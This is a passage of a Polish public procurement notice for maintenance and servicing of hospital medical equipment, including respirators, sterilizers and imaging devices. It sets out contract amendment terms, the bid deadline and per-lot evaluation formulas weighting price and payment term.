              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Wszelkie zmiany Umowy wymagają formy pisemnej pod rygorem nieważności.
2.	Zgodnie z art. 144 ust. 1 ustawy Pzp, Zamawiający przewiduje możliwość dokonania  istotnych zmian postanowień zawartej Umowy w przypadku, gdy konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, tj. spowodowanych:
1)	zmianą powszechnie obowiązujących przepisów prawa lub wynikających z prawomocnych orzeczeń lub ostatecznych aktów administracyjnych właściwych organów - w takim zakresie, w jakim będzie to niezbędne w celu dostosowania postanowień Umowy do zaistniałego stanu prawnego lub faktycznego,
2)	siłą wyższą;
3.	Strony przewidują możliwość zmiany miejsca świadczenia usługi lub zmniejszenia zakresu usług objętych przedmiotem zamówienia - w wyniku wycofania urządzenia z eksploatacji, prowadzonych remontów, modernizacji, przebudowy, zmian organizacyjnych. Zamawiający poinformuje Wykonawcę o wystąpieniu ww. okoliczności z dwumiesięcznym wyprzedzeniem, pisemnie lub drogą elektroniczną.  
4.	Strony dokonają zmiany umowy w zakresie wynagrodzenia Wykonawcy w przypadku zmiany: 
1)	stawki podatku od towarów i usług,
2)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
3)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne
Jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę, 
5.	W przypadku zmiany, o której mowa w ust. 4. Pkt. 1), wartość netto wynagrodzenia Wykonawcy nie zmieni się, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów.
6.	W przypadku zmiany, o której mowa w ust. 4 pkt. 2), wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy wynikającą ze zwiększenia wynagrodzeń osób wykonujących zamówienie do wysokości zmienionego minimalnego wynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia za pracę.
7.	W przypadku zmiany, o której mowa w ust. 4 pkt. 3), wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób wykonujących zamówienie.
8.	Zmiany, o których mowa w ust. 4-7, będą dokonywane na pisemny, umotywowany wniosek Wykonawcy. Wykonawca jest zobowiązany przedstawić oraz wykazać Zamawiającemu, w jaki sposób zmiany, o których mowa w ust. 4 wpływają na koszty wykonania zamówienia przez Wykonawcę. Wniosek Wykonawcy powinien zawierać szczegółowe wyliczenie wpływu zmian, o których mowa ust. 4 pkt 2) i 3) na koszty wykonania zamówienia, poparte odpowiednimi dokumentami. W przypadku, gdy Wykonawca wykaże wpływ zmian przepisów prawa na koszty wykonania zamówienia, Strony dokonają stosownej zmiany umowy.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 23/09/2016, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>zadanie nr 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część - pakiet nr 1 - respiratory<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50421000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 24<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1.	W postępowaniu przy wyborze oferty Zamawiający zastosuje kryteria: 
	- najniższej ceny - waga 60%
- termin płatności -  waga 40%
a)	cena Xc:
do obliczenia  wartości cenowej oferty będzie brana wartość ceny 	brutto. Najniższa zaproponowana cena uzyska 60 pkt. 
Pozostałe ceny uzyskają ilość punktów obliczoną według wzoru:
Xc = Cn / Cp X 60 (z dokładnością do 2 miejsc po przecinku)
Xc   uzyskana ilość punktów,	
	Cn  cena najniższa,
	Cp  cena zaproponowana przez składającego ofertę.
b)	termin zapłaty Xg
do obliczenia wartości punktowej w kryterium termin zapłaty będzie brany pod uwagę zadeklarowany przez Wykonawcę termin zapłaty w dniach , przy czym minimalny termin zapłaty wynosi 30 dni natomiast maksymalny termin płatności wynosi 60 dni. W przypadku braku wskazania terminu zapłaty Zamawiający przyjmie termin 30 dni.
Zadeklarowany najdłuższy termin płatności uzyska 40 punktów.
Pozostałe zadeklarowane terminy zapłaty uzyskają ilość punktów obliczoną według wzoru: 
	Xg = Tg / Tn X 40 (z dokładnością do 2 miejsc po przecinku)
	Xg    - uzyskana ilość punktów,
	Tn    - najdłuższy termin zapłaty (w dniach),
	Tg    - zadeklarowany termin zapłaty (w dniach)..
2.	Jako najkorzystniejsza zostanie wybrana oferta która uzyska najwyższą sumę punktów
	= Xc + Xg
3.	Każdy Wykonawca może zaproponować jedną ofertę cenową.
4.	Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty z niższą ceną (art. 91 ust. 4 ustawy Pzp).
5.	Zamawiający udzieli zamówienia publicznego Wykonawcy spełniającego wszystkie warunki udziału w postępowaniu, którego oferta będzie odpowiadała wszystkim wymaganiom określonym w ustawie Pzp, w SIWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>zadanie nr 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część - pakiet nr 2 - sprzęt okulistyczny<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50421000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 24<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1.	W postępowaniu przy wyborze oferty Zamawiający zastosuje kryteria: 
	- najniższej ceny - waga 60%
- termin płatności -  waga 40%
a)	cena Xc:
do obliczenia  wartości cenowej oferty będzie brana wartość ceny 	brutto. Najniższa zaproponowana cena uzyska 60 pkt. 
Pozostałe ceny uzyskają ilość punktów obliczoną według wzoru:
Xc = Cn / Cp X 60 (z dokładnością do 2 miejsc po przecinku)
Xc   uzyskana ilość punktów,	
	Cn  cena najniższa,
	Cp  cena zaproponowana przez składającego ofertę.
b)	termin zapłaty Xg
do obliczenia wartości punktowej w kryterium termin zapłaty będzie brany pod uwagę zadeklarowany przez Wykonawcę termin zapłaty w dniach , przy czym minimalny termin zapłaty wynosi 30 dni natomiast maksymalny termin płatności wynosi 60 dni. W przypadku braku wskazania terminu zapłaty Zamawiający przyjmie termin 30 dni.
Zadeklarowany najdłuższy termin płatności uzyska 40 punktów.
Pozostałe zadeklarowane terminy zapłaty uzyskają ilość punktów obliczoną według wzoru: 
	Xg = Tg / Tn X 40 (z dokładnością do 2 miejsc po przecinku)
	Xg    - uzyskana ilość punktów,
	Tn    - najdłuższy termin zapłaty (w dniach),
	Tg    - zadeklarowany termin zapłaty (w dniach)..
2.	Jako najkorzystniejsza zostanie wybrana oferta która uzyska najwyższą sumę punktów
	= Xc + Xg
3.	Każdy Wykonawca może zaproponować jedną ofertę cenową.
4.	Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty z niższą ceną (art. 91 ust. 4 ustawy Pzp).
5.	Zamawiający udzieli zamówienia publicznego Wykonawcy spełniającego wszystkie warunki udziału w postępowaniu, którego oferta będzie odpowiadała wszystkim wymaganiom określonym w ustawie Pzp, w SIWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>zadanie nr 3<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część - pakiet nr 3 - urządzenia niepalnych gazów medycznych<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50421000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 24<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1.	W postępowaniu przy wyborze oferty Zamawiający zastosuje kryteria: 
	- najniższej ceny - waga 60%
- termin płatności -  waga 40%
a)	cena Xc:
do obliczenia  wartości cenowej oferty będzie brana wartość ceny 	brutto. Najniższa zaproponowana cena uzyska 60 pkt. 
Pozostałe ceny uzyskają ilość punktów obliczoną według wzoru:
Xc = Cn / Cp X 60 (z dokładnością do 2 miejsc po przecinku)
Xc   uzyskana ilość punktów,	
	Cn  cena najniższa,
	Cp  cena zaproponowana przez składającego ofertę.
b)	termin zapłaty Xg
do obliczenia wartości punktowej w kryterium termin zapłaty będzie brany pod uwagę zadeklarowany przez Wykonawcę termin zapłaty w dniach , przy czym minimalny termin zapłaty wynosi 30 dni natomiast maksymalny termin płatności wynosi 60 dni. W przypadku braku wskazania terminu zapłaty Zamawiający przyjmie termin 30 dni.
Zadeklarowany najdłuższy termin płatności uzyska 40 punktów.
Pozostałe zadeklarowane terminy zapłaty uzyskają ilość punktów obliczoną według wzoru: 
	Xg = Tg / Tn X 40 (z dokładnością do 2 miejsc po przecinku)
	Xg    - uzyskana ilość punktów,
	Tn    - najdłuższy termin zapłaty (w dniach),
	Tg    - zadeklarowany termin zapłaty (w dniach)..
2.	Jako najkorzystniejsza zostanie wybrana oferta która uzyska najwyższą sumę punktów
	= Xc + Xg
3.	Każdy Wykonawca może zaproponować jedną ofertę cenową.
4.	Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty z niższą ceną (art. 91 ust. 4 ustawy Pzp).
5.	Zamawiający udzieli zamówienia publicznego Wykonawcy spełniającego wszystkie warunki udziału w postępowaniu, którego oferta będzie odpowiadała wszystkim wymaganiom określonym w ustawie Pzp, w SIWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br /></div></div><br /></div><div><b>Część nr: </b>4 a
                  
                <b>Nazwa: </b>zadanie nr 4 a<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część - pakiet nr 4a - myjnie<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50421000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 24<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1.	W postępowaniu przy wyborze oferty Zamawiający zastosuje kryteria: 
	- najniższej ceny - waga 60%
- termin płatności -  waga 40%
a)	cena Xc:
do obliczenia  wartości cenowej oferty będzie brana wartość ceny 	brutto. Najniższa zaproponowana cena uzyska 60 pkt. 
Pozostałe ceny uzyskają ilość punktów obliczoną według wzoru:
Xc = Cn / Cp X 60 (z dokładnością do 2 miejsc po przecinku)
Xc   uzyskana ilość punktów,	
	Cn  cena najniższa,
	Cp  cena zaproponowana przez składającego ofertę.
b)	termin zapłaty Xg
do obliczenia wartości punktowej w kryterium termin zapłaty będzie brany pod uwagę zadeklarowany przez Wykonawcę termin zapłaty w dniach , przy czym minimalny termin zapłaty wynosi 30 dni natomiast maksymalny termin płatności wynosi 60 dni. W przypadku braku wskazania terminu zapłaty Zamawiający przyjmie termin 30 dni.
Zadeklarowany najdłuższy termin płatności uzyska 40 punktów.
Pozostałe zadeklarowane terminy zapłaty uzyskają ilość punktów obliczoną według wzoru: 
	Xg = Tg / Tn X 40 (z dokładnością do 2 miejsc po przecinku)
	Xg    - uzyskana ilość punktów,
	Tn    - najdłuższy termin zapłaty (w dniach),
	Tg    - zadeklarowany termin zapłaty (w dniach)..
2.	Jako najkorzystniejsza zostanie wybrana oferta która uzyska najwyższą sumę punktów
	= Xc + Xg
3.	Każdy Wykonawca może zaproponować jedną ofertę cenową.
4.	Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty z niższą ceną (art. 91 ust. 4 ustawy Pzp).
5.	Zamawiający udzieli zamówienia publicznego Wykonawcy spełniającego wszystkie warunki udziału w postępowaniu, którego oferta będzie odpowiadała wszystkim wymaganiom określonym w ustawie Pzp, w SIWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br /></div></div><br /></div><div><b>Część nr: </b>4 b
                  
                <b>Nazwa: </b>zadanie nr 4 b<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część - pakiet nr 4b - myjnie<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50421000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 24<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1.	W postępowaniu przy wyborze oferty Zamawiający zastosuje kryteria: 
	- najniższej ceny - waga 60%
- termin płatności -  waga 40%
a)	cena Xc:
do obliczenia  wartości cenowej oferty będzie brana wartość ceny 	brutto. Najniższa zaproponowana cena uzyska 60 pkt. 
Pozostałe ceny uzyskają ilość punktów obliczoną według wzoru:
Xc = Cn / Cp X 60 (z dokładnością do 2 miejsc po przecinku)
Xc   uzyskana ilość punktów,	
	Cn  cena najniższa,
	Cp  cena zaproponowana przez składającego ofertę.
b)	termin zapłaty Xg
do obliczenia wartości punktowej w kryterium termin zapłaty będzie brany pod uwagę zadeklarowany przez Wykonawcę termin zapłaty w dniach , przy czym minimalny termin zapłaty wynosi 30 dni natomiast maksymalny termin płatności wynosi 60 dni. W przypadku braku wskazania terminu zapłaty Zamawiający przyjmie termin 30 dni.
Zadeklarowany najdłuższy termin płatności uzyska 40 punktów.
Pozostałe zadeklarowane terminy zapłaty uzyskają ilość punktów obliczoną według wzoru: 
	Xg = Tg / Tn X 40 (z dokładnością do 2 miejsc po przecinku)
	Xg    - uzyskana ilość punktów,
	Tn    - najdłuższy termin zapłaty (w dniach),
	Tg    - zadeklarowany termin zapłaty (w dniach)..
2.	Jako najkorzystniejsza zostanie wybrana oferta która uzyska najwyższą sumę punktów
	= Xc + Xg
3.	Każdy Wykonawca może zaproponować jedną ofertę cenową.
4.	Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty z niższą ceną (art. 91 ust. 4 ustawy Pzp).
5.	Zamawiający udzieli zamówienia publicznego Wykonawcy spełniającego wszystkie warunki udziału w postępowaniu, którego oferta będzie odpowiadała wszystkim wymaganiom określonym w ustawie Pzp, w SIWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br /></div></div><br /></div><div><b>Część nr: </b>4 c
                  
                <b>Nazwa: </b>zadanie nr 4 c<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część - pakiet nr 4c - myjnie<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50421000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 24<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1.	W postępowaniu przy wyborze oferty Zamawiający zastosuje kryteria: 
	- najniższej ceny - waga 60%
- termin płatności -  waga 40%
a)	cena Xc:
do obliczenia  wartości cenowej oferty będzie brana wartość ceny 	brutto. Najniższa zaproponowana cena uzyska 60 pkt. 
Pozostałe ceny uzyskają ilość punktów obliczoną według wzoru:
Xc = Cn / Cp X 60 (z dokładnością do 2 miejsc po przecinku)
Xc   uzyskana ilość punktów,	
	Cn  cena najniższa,
	Cp  cena zaproponowana przez składającego ofertę.
b)	termin zapłaty Xg
do obliczenia wartości punktowej w kryterium termin zapłaty będzie brany pod uwagę zadeklarowany przez Wykonawcę termin zapłaty w dniach , przy czym minimalny termin zapłaty wynosi 30 dni natomiast maksymalny termin płatności wynosi 60 dni. W przypadku braku wskazania terminu zapłaty Zamawiający przyjmie termin 30 dni.
Zadeklarowany najdłuższy termin płatności uzyska 40 punktów.
Pozostałe zadeklarowane terminy zapłaty uzyskają ilość punktów obliczoną według wzoru: 
	Xg = Tg / Tn X 40 (z dokładnością do 2 miejsc po przecinku)
	Xg    - uzyskana ilość punktów,
	Tn    - najdłuższy termin zapłaty (w dniach),
	Tg    - zadeklarowany termin zapłaty (w dniach)..
2.	Jako najkorzystniejsza zostanie wybrana oferta która uzyska najwyższą sumę punktów
	= Xc + Xg
3.	Każdy Wykonawca może zaproponować jedną ofertę cenową.
4.	Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty z niższą ceną (art. 91 ust. 4 ustawy Pzp).
5.	Zamawiający udzieli zamówienia publicznego Wykonawcy spełniającego wszystkie warunki udziału w postępowaniu, którego oferta będzie odpowiadała wszystkim wymaganiom określonym w ustawie Pzp, w SIWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>zadanie nr 5<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część - pakiet nr 5 - urządzenia do sterylizacji i destylacji<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50421000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 24<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1.	W postępowaniu przy wyborze oferty Zamawiający zastosuje kryteria: 
	- najniższej ceny - waga 60%
- termin płatności -  waga 40%
a)	cena Xc:
do obliczenia  wartości cenowej oferty będzie brana wartość ceny 	brutto. Najniższa zaproponowana cena uzyska 60 pkt. 
Pozostałe ceny uzyskają ilość punktów obliczoną według wzoru:
Xc = Cn / Cp X 60 (z dokładnością do 2 miejsc po przecinku)
Xc   uzyskana ilość punktów,	
	Cn  cena najniższa,
	Cp  cena zaproponowana przez składającego ofertę.
b)	termin zapłaty Xg
do obliczenia wartości punktowej w kryterium termin zapłaty będzie brany pod uwagę zadeklarowany przez Wykonawcę termin zapłaty w dniach , przy czym minimalny termin zapłaty wynosi 30 dni natomiast maksymalny termin płatności wynosi 60 dni. W przypadku braku wskazania terminu zapłaty Zamawiający przyjmie termin 30 dni.
Zadeklarowany najdłuższy termin płatności uzyska 40 punktów.
Pozostałe zadeklarowane terminy zapłaty uzyskają ilość punktów obliczoną według wzoru: 
	Xg = Tg / Tn X 40 (z dokładnością do 2 miejsc po przecinku)
	Xg    - uzyskana ilość punktów,
	Tn    - najdłuższy termin zapłaty (w dniach),
	Tg    - zadeklarowany termin zapłaty (w dniach)..
2.	Jako najkorzystniejsza zostanie wybrana oferta która uzyska najwyższą sumę punktów
	= Xc + Xg
3.	Każdy Wykonawca może zaproponować jedną ofertę cenową.
4.	Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty z niższą ceną (art. 91 ust. 4 ustawy Pzp).
5.	Zamawiający udzieli zamówienia publicznego Wykonawcy spełniającego wszystkie warunki udziału w postępowaniu, którego oferta będzie odpowiadała wszystkim wymaganiom określonym w ustawie Pzp, w SIWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br /></div></div><br /></div><div><b>Część nr: </b>6 a
                  
                <b>Nazwa: </b>zadanie nr 6 a<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część - pakiet nr 6a - wyposażenie diagnostyki obrazowej<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50421000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 24<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatnośc</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1.	W postępowaniu przy wyborze oferty Zamawiający zastosuje kryteria: 
	- najniższej ceny - waga 60%
- termin płatności -  waga 40%
a)	cena Xc:
do obliczenia  wartości cenowej oferty będzie brana wartość ceny 	brutto. Najniższa zaproponowana cena uzyska 60 pkt. 
Pozostałe ceny uzyskają ilość punktów obliczoną według wzoru:
Xc = Cn / Cp X 60 (z dokładnością do 2 miejsc po przecinku)
Xc   uzyskana ilość punktów,	
	Cn  cena najniższa,
	Cp  cena zaproponowana przez składającego ofertę.
b)	termin zapłaty Xg
do obliczenia wartości punktowej w kryterium termin zapłaty będzie brany pod uwagę zadeklarowany przez Wykonawcę termin zapłaty w dniach , przy czym minimalny termin zapłaty wynosi 30 dni natomiast maksymalny termin płatności wynosi 60 dni. W przypadku braku wskazania terminu zapłaty Zamawiający przyjmie termin 30 dni.
Zadeklarowany najdłuższy termin płatności uzyska 40 punktów.
Pozostałe zadeklarowane terminy zapłaty uzyskają ilość punktów obliczoną według wzoru: 
	Xg = Tg / Tn X 40 (z dokładnością do 2 miejsc po przecinku)
